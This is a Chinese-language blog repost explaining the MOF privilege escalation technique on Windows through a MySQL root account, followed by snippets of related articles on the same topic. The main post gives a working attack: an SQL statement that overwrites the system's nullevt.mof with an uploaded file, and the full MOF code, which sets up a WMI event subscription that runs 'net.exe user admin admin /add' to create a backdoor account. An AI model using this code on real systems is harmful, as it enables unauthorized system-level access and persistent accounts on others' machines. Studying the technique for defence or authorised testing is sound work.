mof提权原理及其过程

最新推荐文章于 2023-10-07 16:38:19 发布
最新推荐文章于 2023-10-07 16:38:19 发布
阅读量393 收藏 4
点赞数 1
文章标签: shell
原文链接:http://www.cnblogs.com/xishaonian/p/6384535.html
版权

mof提权的原理:

mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。

以下是mof提权的过程:

将mof上传至任意可读可写目录下,这里我传到D:\wamp\下命名为:xishaonian.mof。也就是:D:\wamp\xishaonian.mof

然后使用sql语句将系统当中默认的nullevt.mof给替换掉。进而让系统执行我们这个恶意的mof文件。

替换的sql语句:select load_file('D:\wamp\xishaonian.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

mof文件代码如下所示:

#pragma namespace("\\\\.\\root\\subscription") 

instance of __EventFilter as $EventFilter 
{ 
    EventNamespace = "Root\\Cimv2"; 
    Name  = "filtP2"; 
    Query = "Select * From __InstanceModificationEvent " 
            "Where TargetInstance Isa \"Win32_LocalTime\" " 
            "And TargetInstance.Second = 5"; 
    QueryLanguage = "WQL"; 
}; 

instance of ActiveScriptEventConsumer as $Consumer 
{ 
    Name = "consPCSV2"; 
    ScriptingEngine = "JScript"; 
    ScriptText = 
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")"; 
}; 

instance of __FilterToConsumerBinding 
{ 
    Consumer   = $Consumer; 
    Filter = $EventFilter; 
};

可见其中是有一段添加用户的脚本。账号为admin 密码为admin

 

THE END

 

转载于:https://www.cnblogs.com/xishaonian/p/6384535.html

aiquan9342
关注
mysql mof提权_MySQL提权mof提权
weixin_42498989的博客
01-19 734
mof提权原理关于 mof 提权原理其实很简单,就是利用了 c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。下面简单演示下 mof 提权过程MOF提权的条件要求十分严苛:1.windows 03及以下版本2.mysql启动身份具有权限去读写c:/windows...
113.网络安全渗透测试—[权限提升篇11]—[Windows 2003 Mysql MOF提权]
qwsn
07-06 2138
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! mof是windows系统的一个文件,存储在,叫做"托管对象格式",其作用是每隔五秒就会去监控进程创建和死亡。然而提权原理就是在拥有了mysql的root权限以后(其实就是获得了MySQL的启动身份),然后使用该权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs脚本段大多数写的是cmd的添加管理员用户的命令。(1)操作系统版本:Windows Server
mysql mof提权原理_mof提权原理及实现
weixin_36462845的博客
02-01 360
关于 mof 提权原理其实很简单,就是利用了c:/windows/system32/wbem/mof/目录下的nullevt.mof文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。下面简单演示下 mof 提权过程!首先将我们的 mof 提权脚本上传到可读写目录下,这里就不做演示了。接着我们选择 MySQL 提权项,输入我们已经获取的MySQL 账户信息...
Mof提权科普
weixin_30915951的博客
01-23 146
今天再拿一个站的时候遇到了很多问题,拿站的过程就不说了,其中要用到mof提权,不管能不能提下,我进行一个mof提权的科普 这里我综合各类mof提权进行了综合 首先说一下,无shell情况下的mysql远程mof提权利用方法详解 就是你注入拿到了数据库的root账号密码,直接进行 扫到一个站的注入 在havij中得到mysql数据库中mysql库保存的数据库密码: 有...
mysql mof提权原理_mof提权原理及其过程
weixin_39533742的博客
02-01 321
mof提权原理:mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员...
mysql mof提权原理_【提权】MySQL提权MOF
weixin_35266799的博客
02-01 115
0x01 前言Windows管理规范(WMI)提供了如下三种方法编译WMI存储库的托管对象格式(MOF)文件:将MOF文件执行为命令行参数及Mofcomp.exe文件使用IMofCompiler借口和$CompileFile方法拖放到%SystemRoot%\System32\Wbem\MOF文件夹下的MOF文件中使用MOF提权前提是当前root账户可以复制文件到%SystemRoot%\Sys...
mof提权文件nullevt.mof
03-12
mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的...
渗透测试之提权 (udf提权+mof提权+启动项提权
LKmnbZ's Blog
11-07 5740
1. 提权 低权限给高权限去提取(你已经获得一定的权限) Windows 一般用户 系统用户 管理员 system Linux 普通用户 系统用户 root 2. udf提权 1、其利用条件是目标系统是Windows(Win2000,XP,Win2003);拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete 权限以创建和抛弃函...
MOF文件提权
songbai220
11-19 660
MOF文件提权 Windows 管理规范 (WMI) 提供了以下三种方法编译到WMI存储库的托管对象格式 (MOF) 文件: 方法 1: 运行 MOF 文件指定为命令行参数将 Mofcomp.exe 文件。 方法2: 使用 IMofCompiler 接口和 $ CompileFile 方法。 方法 3: 拖放到%SystemRoot%\System32\Wbem\MOF文件夹的 MOF 文件。 Microsoft 建议您到存储库编译 MOF 文件使用前两种方法。也就是运行 Mo...
mysql mof提权_MySQL_MOF提权
weixin_32148341的博客
01-27 276
一、原理Windows管理规范(WMI)提供了如下三种方法编译WMI存储库的托管对象格式(MOF)文件:将MOF文件执行为命令行参数及Mofcomp.exe文件使用IMofCompiler接口和$CompileFile方法拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹下的MOF文件中托管对象格式(MOF)文件在 C:\Windows\System32\wbem\MOF...
mysql mof提权原理_(新安全原创精华)Mysql扩展文件MOF提权详讲
weixin_39773817的博客
01-28 110
本帖最后由 阿甫哥哥 于 2016-8-8 17:24 编辑哈喽,大家好,我是0x_ALis,我代表新安全网络攻防研究室又来咱们的I春秋发精华帖子了。希望大家可以支持我们,我们也会做得更好。无论是批评还是鼓励我们一样接受。【MYSQL提权】Mysql扩展文件MOF提权详讲【原理】在c:/windows/system32/wbem/mof/目录下的nullevt.mof每分钟都会有一个特定的时间去执...
mysql mof提权原理_Mof提权科普
weixin_29706351的博客
02-07 224
首先呢先谢谢米爷在我弄这个的时候把我骂开窍了- -。不多说了~。~像名称一样哈~首先呢是朋友扔我一shell提权差就给咱了,简单的看了下,是php脚本的,一看php脚本就肯定带有,mysql。就在网站目录看了下data文件夹习惯性的~运气不错。Root。居然知道是这东西,上大马。(不知道利用菜刀)OK回显成功。5.0.67不用说都知道是什么了,这版本基本上udf都可以秒的,但毕竟这里说的是mof...
mysql mof提权原理_[原创]WEB安全第六章提权篇12 mof提权
weixin_30631569的博客
02-26 293
WEB安全第六章提权篇12 mof提权1、mof是什么托管对象格式 (MOF) 文件是创建和注册提供程序、事件类别和事件的简便方法。在 MOF 文件中创建类实例和类定义后,可以对该文件进行编译。编译 MOF 文件将在 CIM 储存库中注册所有的类定义和实例。之后,提供程序、事件类别和事件信息便可由 便可由 WMI 和 Visual Studio Analyzer 使用。 在 MOF 文件中创建提供...
mof提权
qq115399231的博客
07-16 549
原理 利用了c:/windows/system32/wbem/mof/目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。 对windwos版本有所要求: 仅限windows server2008以下的版本 mof提权代码 #pragma namespace("\\\\.\\root\\subscription") insta...
Mysql提权方法总结系列-MOF提权
kracer的博客
02-27 3244
0x01 简介 mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。 0x02 条件 mysql有读写 C:/Windows/system32/...
数据库提权--MOF(MYSQL)
最新发布
qq_45936617的博客
10-07 569
MOF提权的利用原理是利用目录下的 nullevt.mof 文件,每隔一段时间(默认5s)都会用系统权限执行一次的特性,来写入cmd命令使其被带入以系统权限执行MOF提权的使用条件是:1、secure_file_priv参数不为null2、有修改nullevt.mof 文件的权限3、数据库用户具有root权限MOF提权的步骤是有恶意语句的mof文件写入到mof目录下-->系统每隔一段时间自动执行。
mysql之mof提权详解
weixin_30376323的博客
01-23 205
原理解读: Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件: 方法1:运行MOF文件指定为命令行参数将Mofcomp.exe文件。方法2:使用IMofCompiler接口和$CompileFile方法。方法3:拖放到%SystemRoot%\System32\Wbem\MOF文件夹的...
MOF手工提权辅助
信安路上……
03-18 321
MOF手工提权辅助: #pragma namespace("\\.\root\subscription") instance of __EventFilter as { EventNamespace = "Root\Cimv2"; Name = "filtP2"; Query = "Select * From __InstanceModificationE...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值